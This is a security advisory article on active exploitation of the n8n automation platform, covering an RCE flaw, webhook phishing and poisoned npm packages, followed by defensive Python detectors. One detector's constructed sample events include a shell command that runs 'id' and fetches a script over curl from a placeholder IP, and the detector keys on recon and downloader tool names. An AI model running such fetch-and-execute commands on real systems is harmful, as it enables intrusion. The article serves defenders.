Threat actors are actively exploiting n8n, a widely deployed open-source workflow automation platform, through a combination of webhook abuse, a critical remote code execution (RCE) vulnerability, and supply chain attacks - posing elevated risks to enterprise software delivery pipelines across regulated and non-regulated industries.
Background
N8n is a workflow automation platform that enables users to connect web applications, APIs, and AI model services to sync data, build agentic systems, and run repetitive rule-based tasks. Its growing adoption as a central orchestration layer in enterprise environments has made it an increasingly attractive target. Because n8n frequently connects internal systems, cloud services, and third-party APIs, the impact of a compromise often cascades across an entire organization.
The platform's attack surface expanded significantly after CVE-2025-68613 was publicly disclosed on December 19, 2025. The vulnerability stems from insufficient isolation in n8n's workflow expression evaluation system, enabling authenticated users to supply specially crafted expressions during workflow configuration that bypass execution context protections and execute arbitrary code on the underlying runtime. It received a CVSS score of 9.9 (Critical) due to its low attack complexity, high impact, and the fact that it affects core application functionality.
Attack Methods and Scope
Active exploitation materialized quickly. Akamai's security intelligence and response team first identified exploitation in mid-January 2026, observing the Zerobot botnet leveraging the vulnerability - the first publicly reported exploitation since disclosure. On March 11, 2026, CISA added CVE-2025-68613 to its Known Exploited Vulnerabilities (KEV) catalog, setting a remediation deadline of March 25, 2026, for federal agencies.
The scale of exposure is significant. Security researchers at Censys identified approximately 103,476 potentially vulnerable n8n instances accessible across the internet, according to CyberPress. The platform's enterprise adoption means compromised instances could facilitate lateral movement, data exfiltration, and supply chain attacks.
Multiple threat actors, including a possible ransomware operator, have shared links to an exploit derived from open-source reporting, and exploitation in the wild has been confirmed. Intel 471's Vulnerability Intelligence researchers observed a publicly available Metasploit module for CVE-2025-68613, noting that the vulnerability has been weaponized and productized.
Parallel to direct exploitation, a separate and sustained phishing campaign has leveraged the platform's legitimate webhook infrastructure. Cisco Talos observed a significant rise in emails containing n8n webhook URLs over the past year, with volume in March 2026 approximately 686% higher than in January 2025. Because webhooks mask the source of the data they deliver, they can serve payloads from untrusted sources while appearing to originate from a trusted domain. Webhooks can also dynamically serve different data streams based on triggering events - such as request header information - allowing a phishing operator to tailor payloads based on the user-agent header.
In one documented campaign, threat actors embedded n8n-hosted webhook links in emails posing as shared documents. Clicking the link directed users to a page displaying a CAPTCHA, which upon completion triggered the download of a malicious payload from an external host. When opened, the payload installed a modified version of the Datto Remote Monitoring and Management (RMM) tool and executed a chain of PowerShell commands.
The vulnerability landscape broadened further in February 2026. Six additional vulnerabilities were discovered in the n8n platform, four rated critical with CVSS severity scores of 9.4. Separately, threat actors were found targeting n8n by planting malicious packages on the npm registry disguised as legitimate n8n add-ons.
Defensive Guidance and Outlook
Security teams face a compounded threat requiring action on multiple fronts. The definitive remediation for CVE-2025-68613 is an immediate upgrade to patched versions 1.120.4, 1.121.1, or 1.122.0, according to Resecurity. For organizations unable to deploy patches immediately, n8n recommends restricting workflow creation and editing permissions to trusted personnel only and deploying n8n in hardened environments with minimal operating system privileges and restricted network access.
Intel 471 recommends monitoring for unexpected child process spawns originating from the n8n process, particularly those executing system commands such as "id" and "whoami," or executables that can act as payload downloaders such as wget and curl, as these indicate active exploitation attempts.
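The child-process detection described above, as an added example that is not n8n's or Intel 471's code: it walks a constructed set of process-creation events in an assumed simplified schema (pid, ppid, image, cmdline) and flags id, whoami, wget or curl running anywhere beneath the n8n Node.js process, including when they are hidden inside a shell -c string.

```python
"""Flag reconnaissance (id, whoami) or downloader (wget, curl) commands spawned
under the n8n runtime. Added example, not n8n's or Intel 471's code; assumes a
simplified process-event schema (pid, ppid, image, cmdline) and constructed data."""
import shlex

SUSPICIOUS = {"id", "whoami", "wget", "curl"}

def is_n8n_process(event):
    """The n8n runtime is a node binary whose command line mentions n8n."""
    image = event["image"].rsplit("/", 1)[-1]
    return image in ("node", "nodejs") and "n8n" in event["cmdline"]

def suspicious_commands(cmdline):
    """Suspicious program names in a command line, including inside a shell -c
    string: separators are split so `sh -c "id; curl http://x"` is caught."""
    try:
        tokens = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes: drop quote chars, split on whitespace
        tokens = cmdline.replace('"', " ").replace("'", " ").split()
    words = []
    for tok in tokens:
        for sep in (";", "||", "|", "&&", "&"):
            tok = tok.replace(sep, " ")
        words.extend(tok.split())
    return sorted({w.rsplit("/", 1)[-1] for w in words} & SUSPICIOUS)

def descends_from_n8n(event, by_pid, max_depth=8):
    """Walk the parent chain (bounded) looking for the n8n runtime."""
    cur = by_pid.get(event["ppid"])
    for _ in range(max_depth):
        if cur is None:
            return False
        if is_n8n_process(cur):
            return True
        cur = by_pid.get(cur["ppid"])
    return False

def detect(events):
    """Return (pid, commands) for each suspicious process in the n8n tree."""
    by_pid = {e["pid"]: e for e in events}
    return [(e["pid"], c) for e in events
            if (c := suspicious_commands(e["cmdline"])) and descends_from_n8n(e, by_pid)]

# Constructed events: n8n runtime, a shell it spawned (recon + download), that shell's curl, and an unrelated admin curl.
SAMPLE_EVENTS = [
    {"pid": 1000, "ppid": 1, "image": "/usr/bin/node", "cmdline": "node /usr/local/bin/n8n start"},
    {"pid": 1002, "ppid": 1000, "image": "/bin/sh", "cmdline": 'sh -c "id; curl http://203.0.113.10/x.sh"'},
    {"pid": 1003, "ppid": 1002, "image": "/usr/bin/curl", "cmdline": "curl -s http://203.0.113.10/x.sh"},
    {"pid": 2000, "ppid": 1, "image": "/usr/bin/curl", "cmdline": "curl https://example.org"},
]
```

Feeding real EDR or auditd process events into `detect` only requires mapping their field names onto the four assumed keys; the bounded parent walk also catches commands launched via an intermediate shell rather than directly by node.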
On the webhook abuse front, defenders should implement behavioral detection that triggers alerts when unusually high traffic volumes target automation platform domains from unexpected internal sources. They should also flag any endpoint communicating with AI automation platform domains outside the organization's approved workflow inventory.
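Both webhook-side detections above, as an added example that is not the page's or Cisco Talos's code: it runs over constructed proxy log lines in an assumed "timestamp source destination-host" format, treats the .app.n8n.cloud suffix as an assumed automation-platform domain, and raises one alert for any internal source reaching an automation host outside the approved workflow inventory and another for bursts of such requests from sources that are not in the inventory at all.

```python
"""Flag endpoints reaching automation-platform domains outside the approved inventory,
plus bursts of such traffic from unexpected internal hosts. Added example; data constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

AUTOMATION_SUFFIXES = (".app.n8n.cloud",)               # assumed platform suffixes
APPROVED = {"10.0.5.20": {"ops-sync.app.n8n.cloud"}}    # src -> hosts it may reach
BURST_THRESHOLD, BURST_WINDOW = 4, timedelta(minutes=10)

def parse_line(line):
    """Parse 'ISO_TIMESTAMP SRC_IP DEST_HOST' (assumed proxy format); None if malformed."""
    parts = line.split()
    if len(parts) != 3:
        return None
    try:
        return {"ts": datetime.fromisoformat(parts[0]), "src": parts[1], "host": parts[2].lower()}
    except ValueError:
        return None

def max_in_window(times, window):
    """Largest number of timestamps that fall inside any span of length `window`."""
    times, best, start = sorted(times), 0, 0
    for end in range(len(times)):
        while times[end] - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best

def analyze(lines):
    """Return sorted alerts as (rule, src, detail) tuples."""
    alerts, hits = set(), defaultdict(list)
    for ev in filter(None, map(parse_line, lines)):
        if not ev["host"].endswith(AUTOMATION_SUFFIXES):
            continue                                    # not automation traffic
        if ev["host"] not in APPROVED.get(ev["src"], ()):
            alerts.add(("unapproved_destination", ev["src"], ev["host"]))
        hits[ev["src"]].append(ev["ts"])
    for src, times in hits.items():
        peak = max_in_window(times, BURST_WINDOW)
        if src not in APPROVED and peak >= BURST_THRESHOLD:
            alerts.add(("burst", src, peak))
    return sorted(alerts)

# Constructed proxy log: approved sync host, a workstation hammering an unknown webhook host, one stray hit, one non-automation request.
SAMPLE_LOG = """\
2026-03-12T09:00:01 10.0.5.20 ops-sync.app.n8n.cloud
2026-03-12T09:01:10 10.0.7.44 x1k2.app.n8n.cloud
2026-03-12T09:01:12 10.0.7.44 x1k2.app.n8n.cloud
2026-03-12T09:01:20 10.0.7.44 x1k2.app.n8n.cloud
2026-03-12T09:03:30 10.0.7.44 x1k2.app.n8n.cloud
2026-03-12T09:04:00 10.0.9.9 other.app.n8n.cloud
2026-03-12T09:04:30 10.0.7.44 intranet.example.org""".splitlines()
```

In production the inventory would be loaded from the workflow catalogue rather than hard-coded, and the threshold tuned against a baseline of normal volume per source.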
Exploitation of CVE-2025-68613 results in complete loss of trust boundaries within n8n, enabling attackers to operate with the same authority as the automation platform itself. For CIOs and security architects overseeing enterprise automation at scale, the convergence of RCE vulnerabilities, supply chain package poisoning, and trusted-infrastructure abuse represents a structural risk requiring both immediate remediation and longer-term governance of open-source automation tooling.
